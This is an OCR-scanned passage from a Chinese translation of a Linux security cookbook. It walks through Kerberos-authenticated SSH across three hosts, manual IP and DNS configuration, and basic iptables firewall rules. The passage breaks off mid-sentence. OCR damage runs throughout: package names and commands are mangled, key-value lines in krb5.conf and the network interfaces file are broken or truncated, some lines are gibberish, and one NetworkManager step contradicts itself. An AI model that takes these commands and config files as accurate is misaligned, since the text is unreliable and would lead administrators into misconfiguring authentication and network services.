libkadmssrv-mit8 libkdbs-6 libkrb5-3 libkrbssupporto libverto-libeventi 
libverto1 

Suggested packages: 


openbsd-inetd inet-superserver krb5-kdc-ldap krb5-doc 
The following NEW packages will be installed: 
krbs-admin-server krb5-config krb5-kdc krb5-user libgssrpc4 
libkadmsclnt-mit8 libkadms5srv-mit8 libkdb5-6 libverto-libeventi libvertoi1 
The following packages will be upgraded: 
libgssapi-krb5-2 libkrbs-3 libkrbssupporto 
3 upgraded, 10 newly installed, © to remove and 323 not upgraded. 
Need to get 1,126 kB of archives. 
After this operation, 2,047 kB of additional disk space will be used. 
Do you want to continue [Y/n]? B 


2. 安 装 过 程 中 需要 根据 提示 键入 一 些 细 市 信息 。 


对 于 问题 “默认 Kerberos 域 ” (Default Kerberos version 5 realm) ， 在 本 例 中 键入 “MYKERBEROS.COM”， 如 下 图 
所 泵 。 


Package configuration 


Configuring Kerberos Authentication 
When users attempt to use Kerberos and specify a principal or user name 
without specifying what administrative Kerberos realm that principal 


| belongs to, the system appends the default realm. The default realm may 

| also be used as the realm of a Kerberos service running on the local 
machine. Often, the default realm is the uppercase version of the local 
DNS domain. 


| Default Kerberos version 5 realm: 


3. 对 于 问题 “你 的 Kerberos 服 务 器 ” (Kerberos servers for your realm) ， 在 本 例 中 我 们 键入 “mykerberos.com ” , 


Configuring Kerberos Authentication 
Enter the hostnames of Kerberos servers in the MYKERBEROS.COM Kerberos 


realm separated by spaces. 


| Kerberos servers for your realm: 


vkerberos.com 


4. 之 后 安装 程序 还 会 要 求 设置 “管理 服务 器 ” (Administrative server for your realm) ， 同 样 键 


A "mykerberos.com" Fl, 


Configuring Kerberos Authentication | 
Enter the hostname of the administrative (password changing) server for 
the MYKERBEROS.COM Kerberos realm. 


Administrative server for your Kerberos realm: 


5. 当 我 们 输入 上 述 必 要 信息 后 ， 这 一 阶段 的 安装 过 程 将 完成 。 接 下 来 要 在 当前 主机 mykerberos.com 中 生成 新 的 Kerberos 
域 ， 我 们 可 以 运行 下 列 命 令 : 


sudo krb5 realm 


运行 命令 的 输出 结果 如 下 图 所 示 : 


tajinder@mykerberos:~$ sudo krbs newrealm 

[sudo] password for tajinder: 

This script should be run on the master KDC/admin server to initialize 
a Kerberos realm. It will ask you to type in a master key password. 
This password will be used to generate a key that is stored in 
[etc/krbskdc/stash. You should try to remember this password, but it 
is much more important that it be a strong password than that it be 
remembered. However, if you lose the password and /etc/krb5kdc/stash, 
you cannot decrypt your Kerberos database. 

Loading random data 

Initializing database '/var/lib/krbskdc/principal' for realm 'MYKERBEROS.COM', 
master key name 'K/MQMYKERBEROS.COM' 

You will be prompted for the database Master Password. 

It is important that you NOT FORGET this password. 

Enter KDC database master key: 

Re-enter KDC database master key to verify: 


6. 在 生成 新 域 的 过 程 中 ， 需 要 为 新 建 的 Kerberos 数 据 库 (KDC database) 设置 访问 密码 ， 这 可 以 根据 自己 的 偏好 进行 设 


定 。 


7. 接 下 来 我 们 需要 编辑 /etc/krb5.confand 文 件 引 ， 并 参考 下 图 对 文件 中 的 “libdefaults” 配置 项 进行 修改 。 如 果 文 件 中 没 
有 这 一 行 ， 融 上 自己 添 加 进去 。 


[libdefaults] 
default realm - MYKERBEROS . COM 


[realms | 
MYKERBEROS. COM 
kdc = mykerberos.com 
admin server - mykerberos.com 


9. 接 着 修改 /etc/krb5.confand 文 件 中 的 “domain realm ”配置 项 ， 键 入 下 列 语句 : 


mykerberos.com = MYKERBEROS.COM 
.mykerberos.com = MYKERBEROS.COM 


修改 后 ， 文 件 内 容 如 下 图 所 示 : 


[domain realm] 
.mit.edu = ATHENA.MIT.EDU 
mit.edu - ATHENA.MIT.EDU 
.Dedia.mit.edu = MEDIA-LAB.MIT.EDU 
media.mit.edu - MEDIA-LAB.MIT.EDU 
.Csail.mit.edu = CSAIL.MIT.EDU 
csail.mit.edu = CSAIL.MIT.EDU 


.Whoi.edu = ATHENA.MIT.EDU 

whoi.edu - ATHENA.MIT.EDU 
.stanford.edu - stanford.edu 
.slac.stanford.edu - SLAC.STANFORD. EDU 
mykerberos.com - MYKERBEROS. COM 
.mykerberos .com = MYKERBEROS. com 


10. 对 /etc/krb5.confand 文 件 完成 编辑 后 ， 需 要 向 Kerberos 数 据 库 中 增加 规则 ， 用 来 摘 述 网 络 中 的 服务 和 用 户 。 每 个 用 户 
都 需要 在 数据 库 中 设置 规则 后 才能 使 用 Kerberos 认 证 ， 这 一 步骤 可 以 使 用 kadmin.local 工 具 来 实现 。 运 行 下 列 命 令 局 动 


kadmin.local: 


sudo kadmin.local 
命令 执行 后 会 进入 kadmin.local 命 令 环境 ， 如 下 图 所 示 : 


tajinder(ümykerberos:-S$ sudo kadmin.local 

Authenticating as principal root/admingMYKERBEROS.COM with password. 
kadmin.local:  listprincs 

K/MaMYKERBEROS . COM 

kadmin/admingMYKERBEROS . COM 

kadmin/changepw(gMYKERBEROS . COM 


kadmin/ec2-54-201-82-69.us-west-2.compute.amazonaws.com(MMYKERBEROS . COM 


krbtgt/MYKERBEROS . COMQüMYKERBEROS . COM 
kadmin. local: 


11. 如 果 想 查看 已 经 存在 的 规则 ， 可 以 运行 下 列 命令 : 
list princs 


12. 现 在 试看 为 某 个 用 户 增 加 规则 ， 可 以 使 用 addprinc 命 令 。 本 例 中 将 以 增加 tajinder 用 户 为 例 。 运 行 下 图 所 示 命 令 : 


kadmin.local:  addprinc tajinder 
WARNING: no policy specified for tajinder(MYKERBEROS.COM; defaulting to no polic 


y 
Enter password for principal "tajinder(üMYKERBEROS. COM" : 


Re-enter password for principal "tajinder(MYKERBEROS. COM" : 
Principal "tajindergMYKERBEROS.COM" created. 
kadmin. local: 


13. 为 了 赋予 root 账 号 管理 员 (admin) 权限 ， 使 用 下 图 所 示 命 令 : 


kadmin.local: addprinc root/admin 

WARNING: no policy specified for root/admingMYKERBEROS.COM; defaulting to no pol 
icy 

Enter password for principal "root/admin(iMYKERBEROS.. COM" : 

Re-enter password for principal "root/admingMYKERBEROS. COM" : 

Principal "root/admingMYKERBEROS.COM" created. 

kadmin. local: 


14. 如 果 我 们 将 管理 员 权 限 赋予 每 个 用 户 ， 那 么 取消 文件 /etc/krb5kdc/kadm5.acl 中 “*/admin” 这 一 行 前 面 的 注释 标记 即 


15. 要 检查 上 面 设置 的 规则 是 否 被 正确 应 用 时 ， 可 以 使 用 下 列 命 令 : 
kinit 


16. 在 主机 mykerberos.com 中 完成 以 上 Kerberos 系 统 的 安装 配置 工作 后 ， 我 们 将 打开 客户 端 主机 sshclient.com， 使 用 下 图 


所 示 命 令 安装 Kerberos 的 客户 端 程序 : 


tajinder@sshclient:~$ sudo apt-get install krb5-user 

[sudo] password for tajinder: 

Reading package lists... Done 

Building dependency tree 

Reading state information... Done 

The following extra packages will be installed: 
krb5s-config libgssapi-krb5-2 libgssrpc4 libkadmsclnt-mit8 libkadmssrv-mit8 
libkdbs5-6 libkrbs-3 libkrb5supporto 

Suggested packages: 
krb5-doc 

The following NEW packages will be installed: 
krb5-config krbs5-user libgssrpc4 libkadmsclnt-mit8 libkadm5srv-mit8 
libkdb5-6 

The following packages will be upgraded: 
libgssapi-krbs-2 libkrbs-3 libkrb5ssupportó 


3 upgraded, 6 newly installed, © to remove and 323 not upgraded. 


Need to get 834 kB of archives. 
After this operation, 1,129 kB of additional disk space will be used. 


Do you want to continue [Y/n]? 


17. 客 尸 端 安装 过 程 中 会 要 求 回 答 一 些 与 安 六 Kerberos 服 务 器 程序 时 相同 的 问题 ， 这 时 我 们 键入 前 面 介绍 过 的 相同 内 容 即 


RJ, 


18. 完 成 客户 端 安装 后 ， 需 要 使 用 ping 命 令 检 查 否 能 从 sshclient.com 主 机 连通 mykerberos.com 服 务 器 。 


19. 现 在 ,我 们 可 以 根据 之 前 在 mykerberos.com 服 务 器 上 设置 的 规则 获得 客户 端 票 据 ， 使 用 下 列 命 令 : 


tajinder@sshclient:~$ kinit root/admin 
Password for root/admingMYKERBEROS. COM: 


tajindergsshclient:-$S B 


如 果 上 述 命 令 运行 无 错误 ， 那 么 意味 着 Kerberos 工 作 正 常 。 


完成 上 面 步骤 之 后 ， 我 们 切换 到 第 3 个 Linux 主 机 上 ， 即 SSH 服 务 器 sshservercom。 我 们 需要 人 在 这 人 台 机 器 上 安 半 9SH 服 务 器 
问 程 序 和 Krb5-config 程 序 。 需 要 执行 的 命令 如 下 图 所 示 : 


tajinder@sshserver:~$ sudo apt-get install openssh-server krb5-config 
[sudo] password for tajinder: 
Reading package lists... Done 
Building dependency tree 
Reading state information... Done 
openssh-server is already the newest version. 
The following NEW packages will be installed: 
krb5-config 
9 upgraded, 1 newly installed, © to remove and 326 not upgraded. 
Need to get 23.0 kB of archives. 
After this operation, 98.3 kB of additional disk space will be used. 
Do you want to continue [Y/n]? 


这 里 也 会 被 询问 一 些 与 上 面相 同 的 问题 ， 按 照 之 前 的 回答 键入 即 可 。 


20. 命 令 执行 完 后 ， 需 要 编辑 /etc/ssh/sshd config 文 件 ， 并 使 下 列 几 行 有 效 : 


# GSSAPI options 
H&GSSAPIAuthentication no 


PFGSSAPICleanupCredentials yes 


21. 去 掉 上 述 几 行 前 的 “#” 号 并 改变 其 值 为 “yes”， 即 设置 “GSSAPlAuthentication 
yes” 和 “GSSAPICleanupCredentials yes" , 保存 文 件 并 退出 。 之 后 运行 下 列 命 令 重 新 局 动 SSH 服 务 : 


sudo service ssh restart 


22. 接 下 来 回 到 Kerberos 服 务 器 ， 我 们 将 配置 Kerberos 服 务 器 使 其 能 与 SSH 服 务 器 配合 工作 。 在 Kerberos 服 务 器 上 运行 
sudo kadmin.local 命 令 ， 和 启动 kadmin.local 工 具 ， 然 后 执行 下 列 命令 : 


kadmin.local:  addprinc -randkey host/sshserver.com 


WARNING: no policy specified for host/sshserver.comüMYKERBEROS.COM; defaulting t 
o no policy 


Principal "host/sshserver.comQMYKERBEROS.COM" created. 
kadmin. local: 


23. 上 述 命令 为 SSH 服 务 器 增加 了 规则 ， 接 下 来 运行 下 图 中 的 命令 ， 生 成 密 钥 文 件 : 


kadmin.local: ktadd -k /tmp/sshserver.com.keytab host/sshserver.com 

Entry for principal host/sshserver.com with kvno 2, encryption type aes256-cts-h 
mac-sha1-96 added to keytab WRFILE:/tmp/sshserver.com.keytab. 

Entry for principal host/sshserver.com with kvno 2, encryption type arcfour-hmac 
added to keytab WRFILE:/tmp/sshserver.com.keytab. 

Entry for principal host/sshserver.com with kvno 2, encryption type des3-cbc-sha 
1 added to keytab WRFILE:/tmp/sshserver.com.keytab. 

Entry for principal host/sshserver.com with kvno 2, encryption type des-cbc-crc 
added to keytab WRFILE:/tmp/sshserver.com.keytab. 

kadmin. local: 


24. 将 密 钥 文 件 从 Kerberos 服 务 器 复制 到 SSH 服 务 器 ， 可 以 使 用 下 列 命 令 : 


tajinder@mykerberos:~$ sudo scp /tmp/sshserver.com.keytab tajinder(sshserver.com 
:/tmp/krb5.keytab 


tajinder(üsshserver.com's password: 


sshserver.com.keytab 100% 306 0.3KB/s X 00:00 
tajindergmykerberos:-$S B 


25. 密 钥 文 件 复制 完成 后 ， 需 要 将 它 从 SSH 服 务 器 sshserver.com 的 /tmp/ 目 录 移 动 到 /etc/directory， 登 录 SSH 服 务 器 


sshserver.com 完 成 此 操作 。 
26. 再 次 登录 客户 端 ， 编 辑 /etc/ssh/ssh_config 文 件 ， 使 其 包含 下 列 内 容 : 


GSSAPIAuthentication yes 
GSSAPIDelegateCredentials yes 


27. 为 了 在 客户 端 上 获取 Kerberos 认 证 票据 ， 运 行 下 列 命令 : 
kinit tajinder 


28. E xRáp dar, KEA e ssh/A2z Pim eESRSSHBRAS gs : 


tajinder@sshclient:~$ ssh sshserver.com 
Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686) 


* Documentation:  https://help.ubuntu.com/ 


New release '14.04.3 LTS' available. 
Run 'do-release-upgrade' to upgrade to it. 


Last login: Tue Jan 5 09:23:52 2016 from mykerberos.com 
tajindergsshserver:-S 国 


如 上 图 所 示 ， 用 户 没 家 要求 键入 口令 但 通过 了 认证 。 


原理 解析 


首先 ， 我 们 在 第 一 个 Linux 系 统 上 安装 了 Kerberos 服 务 器 程序 。 安 装 完毕 后 ， 通 过 编辑 /etc/krb5.conf 文 件 中 的 配置 选项 ， 
生成 了 一 个 Kerberos 域 。 


接着 ， 为 了 使 用 户 能 使 用 Kerberos 协 议 进 行 认证 ， 我 们 向 Kerberos 数 据 库 增加 了 一 条 规则 。 


完成 上 述 步 骤 后 ， 我 们 在 第 二 个 Linux 系 统 中 安装 了 Kerberos 用 户 端 程序 ， 建 立 了 客户 端 系统 。 之 后 ， 在 客户 端 上 为 用 户 账 
号 获取 了 来 自 服务 器 的 Kerberos 票 据 。 


接 下 来 ， 我 们 在 第 三 个 Linux 系 统 上 安装 了 Openssh-server 程 序 并 建立 了 SSH 服 务 器 。 通 过 编辑 SSH 服 务 的 配置 文件 打开 认 
证 选项 。 


最 后 回 到 Kerberos 服 务 器 ， 为 SSH 服 务 器 增加 一 条 Kerberos 数 据 库 规则 。 之 后 为 SSH 服 务 器 生成 一 个 密 钥 文件 ， 并 使 用 scp 
命令 将 其 复制 到 SSH 服 务 器 上 。 


经 过 上 述 步骤 ， 当 我 们 尝试 从 客户 端 系 统 登 录 SSH 服 务 器 上 时， 登录 过 程 不 要 键入 口令 ， 这 是 由 于 之 前 生成 的 密 钥 文件 和 
Kerberos 服 务 票据 已 经 存在 于 服务 器 和 客户 端 中 ， 而 Kerberos 服 务 器 利用 这 些 信息 完成 了 客户 端 用 户 的 认证 ， 并 且 授 权 用 户 可 
以 访问 SSH 服 务 器 。 


译 者 注 
[2] 在 大 型 网 络 中 ，Kketbetros 服 务 器 与 管理 服务 器 通常 是 不 同 的 ， 但 要 本 例 中 我 们 设置 为 同一 台 服 务 器 。 译 者 注 
[3] 新 版 本 的 krtb5 配 置 文件 为 /etc/krb5.conf。 译 者 注 


[1 主机 名 的 修改 可 以 通过 编辑 /etc/hostname 文 件 实现 。 


第 6 章 ”网 络 安全 


本 章 将 讨论 如 下 主题 : 


: 管理 TCP/IP 网 络 


` 使 用 iptables 配 置 防火 墙 
阻止 地 址 伪装 
: 拦截 入 站 流量 


- 配置 使 用 TCP Wrapper 


6.1 ”管理 TCP/IP 网 络 


当 计 算 机 之 间 彼 此 和 连接、 形成 网 络 ， 开 始 相互 交换 信息 与 资源 时 ， 管 理 网 络 信息 融 成 为 系统 管理 员 的 一 项 重要 任务 。 
准备 工作 


在 准备 对 TCP/IP 配 置 做 任何 改变 之 前 ， 请 确保 已 经 对 当前 的 网 络 配置 文件 进行 了 备份 。 可 以 使 用 下 列 命令 : 


rootüsshserver:-$4 cp /etc/NetworkManager /NetworkManager.conf /etc/NetworkManager 
/NetworkManager.conf .bak 


rootüsshserver: 


之 后 ， 再 使 用 相同 命令 对 /etc/network/interfaces 进 行 备份 。 
操作 指南 


在 本 节 我 们 将 学 习 如 何 使 用 命令 手动 配置 网 络 。 


1. 在 开始 配置 之 前 ， 先 查看 一 下 当前 的 I|P 地 址 ， 这 个 IP 地 址 是 由 DHCP 服 务 器 自动 指派 的 。 可 以 使 用 鼠标 右键 单 击 Ubuntu 
Linux 果 面 右上 和 角 的 “网 络 ” (Networking) 图 标 并 选择 “连接 信息 ” (Connection Information) ， 以 图 形 化 方式 来 查看 这 
些 细节 信息 ， 结 果 如 下 图 所 示 : 


$ Ty 49) £00AM £ Tajinder il 


& Connection Information 


Wired connection 1 


o Active Network Connections Disconnect 


Wired connection 1 (default) 


VPN Connections 


General v Enable Networking 
Interface: Ethernet (etho) 

Hardware Address: 00:0C:29:28:72:D0 

Driver: pcnet32 Edit Connections... 
Speed: Unknown 

Security: None 

1Pvd4 

IP Address: 192.168.1.101 

Broadcast Address: 192.168.1.255 

Subnet Mask: 255.255.255.0 

Default Route: 192.168.1.1 

Primary DNS: 192.168.1.1 


可 以 看 到， 当前 系统 的 IP 地 址 为 192.168.1.101。 
2. 还 可 以 使 用 命令 行 来 查看 这 些 信息 ， 如 下 图 所 示 运 行 ifconfig 命 令 : 


root@sshserver:~# ifconfig 

ethe Link encap:Ethernet HWaddr 00:0c:29:28:72:d6 
inet addr:192.168.1.101 $8Bcast:192.168.1.255 Mask:255.255.255.0 
inetó addr: fe80::20c:29ff:fe28:72d6/64 Scope:Link 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
RX packets:141738 errors:4 dropped:4 overruns:0 frame:0 
TX packets:61838 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:1008 
RX bytes:36084367 (36.0 MB) TX bytes:9779618 (9.7 MB) 
Interrupt:19 Base address:0x2000 


3. 如 果 想 查看 系统 中 可 用 的 以 太 网 设备 ， 可 运行 下 列 命令 : 


rootüsshserver:-3 ifconfig -a | grep eth 
ethe Link encap:Ethernet HWaddr 00:0c:29:28:72:d6 


rootüsshserver:-it D 


该 命令 将 逐 行列 出 所 有 可 用 的 以 太 网 卡 信息 。 


4. 如 果 想 查看 网 卡 的 细节 信息 ， 可 以 使 用 shw 工 具 。 该 工具 能 够 列 出 网 卡 硬 件 的 详细 信息 。 


rootüsshserver:-£ lshw -class network 
*-network 
description: Ethernet interface 
product: 79c970 [PCnet32 LANCE] 
vendor: Hynix Semiconductor (Hyundai Electronics) 
physical id: 1 
bus info: pcig098098:02:01.0 
logical name: ethe 
version: 10 
serial: 08:0c:29:28:72:d6 
width: 32 bits 
clock: 33MHz 
capabilities: bus master rom ethernet physical logical 
configuration: broadcast-yes driver-pcnet32 driverversion-1.35 ip-192.168 
.1.101 Latency=64 link=yes maxlatency-255 mingnt=6 multicast-yes 
resources: irq:19 ioport:2008(size-128) memory:e7b00000-e7boffff 
root(üsshserver :~# 


5. 现 在 关闭 网 络 管理 器 ， 尝 试 手动 设置 IP 地 址 信息 。 关 闭 网 络 管理 器 的 方法 是 编 
辑 /etc/NetworkManager/NetworkManager.conf 文 件 ， 如 下 图 所 示 : 


[main | 
plugins-ifupdown,keyfile 
dns-dnsmasq 


no-auto-default-80:0C:29:28:72:D6, 


[ifupdown] 
managed-false 


将 “managed=false” 变 更 为 “managed=true” ， 然 后 保存 文件 中。 


6. 现 在 ， 用 文本 编辑 器 打开 /etc/networkwyinterfaces 文 件 ， 默 认 情况 下 文件 里 没有 以 太 网 卡 eth0 的 信息 。 


auto lo 


iface lo inet loopback 


7. 在 interfaces 文 件 中 增加 下 图 中 所 示 的 信息 。1P 地 址 的 设置 要 与 实际 可 用 的 IP 地 址 一 致 ， 在 本 例 中 使 用 192.168.1.101。 


auto lo 
iface lo inet loopback 


auto ethe 
iface ethe inet static 


192.168. 
255.4255. 
192.1608. 
192.1608. 
192.168. 


完成 文件 修改 后 保存 并 退出 ， 然 后 重启 计算 机 。 


8. 如 果 希 望 生 成 一 个 虚拟 了 网卡， 可 以 在 文件 /etc/network/interfaces 文 件 中 增加 下 列 内 容 : 


auto eth8:0 
iface eth0:0 inet static 


192.168.1.110 
255.255.255.0 
192.168.1.1 


通过 上 述 语句 ， 我 们 在 一 块 以 太 网 卡 上 设置 了 两 个 IP 地 址 ， 即 由 一 块 物理 网 卡 生 成 了 多 个 逻辑 网 卡 。 
9. 完 成 上 述 步骤 后 ， 需 要 重 局 网 络 服务 使 乙 生 效 ， 可 以 运行 下 列 命令 中 的 任何 一 个 : 


service network-manager restart 


/etc/init.d/networking restart 


10. 下 面 来 看 一 下 如 何 配置 域名 服务 器 (DNS) 。 当 手动 配置 |P 地 址 时 ， 系 统 需要 指定 DNS 服务 器 。 使 用 任何 一 种 编辑 器 编 
辑 /etc/resolv.conf 文 件 全 ， 增 加 下 图 所 示 的 几 行 : 


nameserver 192.168.1.1 
nameserver 192.168.1.1] 


nameserver 127.0.0.1 
search com 


通过 上 述 各 步 又， 我 们 成 功 地 配置 了 IP 地 址 信息 。 


原理 解析 


系统 中 TCP/IP 的 配置 既 可 以 自动 管理 ， 也 可 以 手动 配置 。Linux 系 统 是 根 
据 /etc/NetworkManager/NetworkManager.conf 文 件 的 内 容 来 决定 主机 的 IP 地 址 是 自动 获取 还 是 手动 配置 的 。 


如 果 需 要 手动 配置 IP 地址 ， 可 以 编辑 /etc/network/interfaces 文 件 ， 键 入 可 用 的 IP 地 址 。 编 辑 完成 之 后 ， 需 要 重启 网 络 服 
务 或 重启 计算 机 使 之 生效 。 


[1] 配置 文件 中 的 managed 属 性 控制 Network Managet 是 否 管 理 /etc/netwotk/interfaces 文 件 中 列 出 的 接口 。managed=true 表 示 interfaces 


译 


文件 列 出 的 接口 使 用 NetwotkManaget 进 行 管理 ， 而 managed=false 表 示 NetwotkManaget 将 忽略 intetfaces 文 件 中 列 出 的 接口 。 
者 注 
[2] tesolv.conf 文 件 用 于 配置 DNS 服务 器 的 JP 地 址 及 域名 搜索 顺序 。 


译 者 注 


6.2 ”使 用 iptables 配 置 防火 墙 


在 加 强 Linux 系 统 的 安全 方面 ， 建 立 一 个 可 靠 的 防火 墙 是 十 分 必要 的 一 步 。 许 多 Linux 发 行 版 中 都 预先 安装 了 不 同 的 防火 墙 工 
具 ，iptables 是 最 为 常用 的 一 种 。 在 老 的 Linux 版 本 中 ， 默 认 的 防火 墙 工 具 是 ipchains。 


准备 工作 


由 于 iptables 通 常 是 Linux 发 行 版 自 带 的 工具 ， 所 以 不 需要 安装 其 他 软件 。 但 关于 使 用 iptables， 我 们 有 一 些 建议 : 不 要 使 用 
root 账 号 直接 操作 ， 使 用 有 超级 用 户 权限 的 普通 账号 来 运行 jptables 会 更 加 安全 。 


操作 指南 
我 们 可 以 使 用 iptables 设 置 规 则 ， 检 测 入 站 和 出 站 的 网 络 数据 包 。Linux 内 核 中 的 网 络 部 分 会 按照 规则 处 理 数据 包 。 
1. 首 先 ， 使 用 如 下 命令 检查 当前 Linux 系 统 自 带 的 iptables 版 本 。 


root@sshserver:~# iptables -V 
iptables v1.4.12 


root@sshserver:-# B 


2 .接着 使 用 “-L” 选项， 检查 一 下 当前 系统 中 是 否 已 经 存在 iptables 规 则 中]: 


root@sshserver:~# iptables -L 
Chain INPUT (policy ACCEPT) 
target prot opt source destination 


Chain FORWARD (policy ACCEPT) 
target prot opt source destination 


Chain OUTPUT (policy ACCEPT) 
target prot opt source destination 
root(üsshserver :~# 


3. 可 以 使 用 选项 “-S” 显 示 每 条 链 的 策略 ,策略 规定 了 iptables 每 条 链 对 数据 包 的 默认 处 理 方式 : 


root@sshserver:~# iptables -S 
-P INPUT ACCEPT 

-P FORWARD ACCEPT 

-P OUTPUT ACCEPT 
root(üsshserver :~# 


4. 为 了 了 解 当前 iptables 的 功能 ， 可 以 使 用 lsmod 命 令 查 看 当前 系统 默认 局 动 的 iptables 模 块 有 哪些 。 


root@sshserver:~# lsmod | grep ip tables 
ip tables 18302 1 iptable filter 


x tables 22178 2 iptable filter,ip tables 
rootüsshserver:-it 国 


5. 下 面 我 们 尝试 增加 一 条 规则 ， 以 保证 当前 所 有 在 线 的 网 络 连 接 仍 保持 在 线 ， 即 便 之 后 设立 了 某 个 规则 来 阻塞 一 些 服务 : 


iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j 
ACCEPT 


这 里 ，“-A” 选项 表示 增加 一 条 规则 。 “INPUT” 表 示 这 条 规则 位 于 filter 表 的 INPUT 链 上 ; 参数 “-m conntrack" 表示 调 
用 conntrack 模 块 ， 跟 路 记录 每 个 连接 的 状态 ; 参数 “--ctstateESTABLISHED，RELATED” 表示 检测 人 在线 数据 包 的 状态 ， 对 于 
当前 状态 为 ESTABLISHED 或 RELATED 的 数据 包 则 根据 参数 “-)” 的 设置 进行 处 理 ; 参数 “-jACCEPT” 表 示 接 收 且 允许 满足 前 面 
条 件 的 数据 包 通 过 防火 墙 。 


6. 我 们 再 查看 一 下 iptables 规 则 列表 ,会 友 现 上 面 的 规则 已 被 增加 。 


root@sshserver:~# iptables -L 
Chain INPUT (policy ACCEPT) 


target prot opt source destination 
ACCEPT all -- anywhere anywhere ctstate RELATED,ESTABLISHED 


Chain FORWARD (policy ACCEPT) 
target prot opt source destination 


Chain OUTPUT (policy ACCEPT) 


target prot opt source destination 
rootüsshserver:-it D 


7. 假 设 我 们 想 允 许 SSH 连 接 通 过 iptables 防 火 墙 ， 那 么 可 以 增加 下 列 规则 : 


root@sshserver:~# iptables -A INPUT -p tcp --dport 22 -j ACCEPT 
rootüsshserver:-£ iptables -L 
Chain INPUT (policy ACCEPT) 
prot opt source destination 
all -- anywhere anywhere ctstate RELATED,EST 


tcp -- anywhere anywhere tcp dpt:ssh 


Chain FORWARD (policy ACCEPT) 
target prot opt source destination 


Chain OUTPUT (policy ACCEPT) 
target prot opt source destination 
root(üsshserver :~# 


这 条 规则 允许 目标 端口 号 为 22 的 TCP 数 据 包 通过 。 在 这 里 我 们 假定 了 SSH 服 务 使 用 TCP 协 议 22 号 端口 ， 如 果 SSH 服 务工 作 在 
别 的 端口 ， 请 上 自行 修改 端口 号 为 恰当 值 。 


8. 为 使 我 们 的 服务 器 功能 保持 正常 ， 需 要 保证 本 机 上 的 服务 进程 之 间 的 相互 通信 不 被 iptables 规 则 所 阻塞 ， 因 此 可 以 增加 下 
列 规则 ， 人 允许 所 有 被 送 到 loopback 接 口 的 数据 包 通 过 。 


iptables -I INPUT 1 -i lo -j ACCEPT 


9. 选 项 “-| ”告诉 iptables 要 插入 一 条 规则 而 不 是 添加 一 条 规则 。 “-|” 选项 需要 所定 插入 的 链 和 在 链 中 的 位 置 。 本 例 中 ， 规 
则 被 插入 到 INPUT 链 的 首位 ， 因 此 它 将 是 INPUT 链 中 第 一 个 被 应 用 的 规则 。 


10. 我 们 使 用 显示 详情 的 选项 “-v” 查 看 一 下 iptables 的 规则 列表 ， 可 以 友 现 有 关 Io ( 即 loopback 接 口 ) 的 规则 位 于 INPUT 
规则 链 的 百 位 。 


rootüsshserver:-$£ iptables -L -v 
Chain INPUT (policy ACCEPT 2 packets, 64 bytes) 
pkts bytes target prot opt in out source destination 


0 © ACCEPT all -- lo any anywhere anywhere 


12 2928 ACCEPT all -- any any anywhere anywhere 
ctstate RELATED,ESTABLISHED 


0 © ACCEPT tcp -- any any anywhere anywhere 
tcp dpt:ssh 


Chain FORWARD (policy ACCEPT © packets, © bytes) 
pkts bytes target prot opt in out source destination 


Chain OUTPUT (policy ACCEPT 1 packets, 32 bytes) 
pkts bytes target prot opt in out source destination 


root(ssshserver :~# 


11. 假 定 我 们 已 经 根据 需要 增加 了 人 允许 特定 数据 包 通 过 INPUT 链 的 规则 ， 那 么 接 下 来 还 要 确保 任何 其 他 进入 INPUT 链 的 数据 
包 都 被 阻塞 。 为 实现 这 一 点 ， 可 以 追加 下 列 规则 : 


iptables -A INPUT -j DROP 


root@sshserver:~# iptables -A INPUT -j DROP 
rootüsshserver:-£ iptables -L 
Chain INPUT (policy ACCEPT) 
prot opt source destination 
all -- anywhere anywhere 
all -- anywhere anywhere ctstate RELATED ,ES 


tcp -- anywhere anywhere tcp dpt:ssh 
-- anywhere anywhere 


Chain FORWARD (policy ACCEPT) 
target prot opt source destination 


Chain OUTPUT (policy ACCEPT) 
target prot opt source destination 


从 上 图 可 以 看 出 ， 丢 奔 所 有 数据 包 的 规则 已 经 被 追加 到 INPUT 链 的 底 端 。 对 于 每 个 进入 INPUT 链 的 数据 包 ， 都 会 在 最 后 受 
到 这 条 规则 的 审查 ， 几 是 不 满足 之 前 所 有 人 允许 通过 规则 的 数据 包 ， 将 根据 这 条 规则 被 丢弃 ， 这 可 以 防止 数据 包 默 认 通 过 INPUT 
链 进 入 本 机 系统 。 


12. 到 目前 为 止 ， 我 们 增加 到 iptables 中 的 规则 都 是 临时 性 的 ， 一 旦 系统 重新 启动 ， 这 些 规则 将 被 清空 。 为 了 将 这 些 规则 保 
仔 下 来 并 且 在 每 次 iptables 司 动 时 自动 加 载 ， 我 们 需要 使 用 iptables-persistent 工 具 。 


13.iptables-persistent 工 具 需 要 先 安装 ， 安 装 命令 如 下 : 
apt-get install iptables-persistent 


root@sshserver:~# apt-get install iptables-persistent 
Reading package lists... Done 
Building dependency tree 


Reading state information... Done 

The following NEW packages will be installed: 
iptables-persistent 

© upgraded, 1 newly installed, 8 to remove and 326 not upgraded. 


Need to get 8,960 B of archives. 

After this operation, 58.4 kB of additional disk space will be used. 

Get:1 http://in.archive.ubuntu.com/ubuntu/ precise/universe iptables-persistent a 
ll 0.5.3ubuntu2 [8,960 B] 

Fetched 8,968 B in Os (11.7 kB/s) 

Preconfiguring packages .. 

Selecting previously unselected package iptables-persistent. 

(Reading database ... 144788 files and directories currently installed.) 
Unpacking iptables-persistent (from .../iptables-persistent 0.5.3ubuntu2 all.deb) 


Processing triggers for ureadahead .. 

Setting up iptables-persistent (0.5.3ubuntu2) 
* Loading iptables rules... 

*  IPv4... 

+  IPv6... 

rootüsshserver:-it 国 


14. 在 安装 过 程 中 ， 需 要 回答 “是 否 希望 保存 当前 iptables 规 则 并 自动 调用 它们 ” ， 这 可 以 根据 你 的 实际 需求 ， 
BE "Yes" 或 “No”。 


Current iptables rules can be saved to the configuration file 
[etc/iptables/rules.v4. These rules will then be loaded automatically 
during system startup. 


Rules are only saved automatically during package installation. See the 
manual page of iptables-save(8) for instructions on keeping the rules 
file up-to-date. 


Save current IPv4 rules? 
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rootüsshserver:-€ service iptables-persistent start 
* Loading iptables rules... 
*  IPv4.. 


* — IPv6... 
rootüsshserver:-i B 


原理 解析 


在 上 面 的 实验 中 ， 我 们 使 用 Linux 中 的 iptables 为 目 己 的 系统 配置 了 防火 墙 。 我 们 首先 介绍 了 iptables 命 令 的 一 些 基 本 选项 
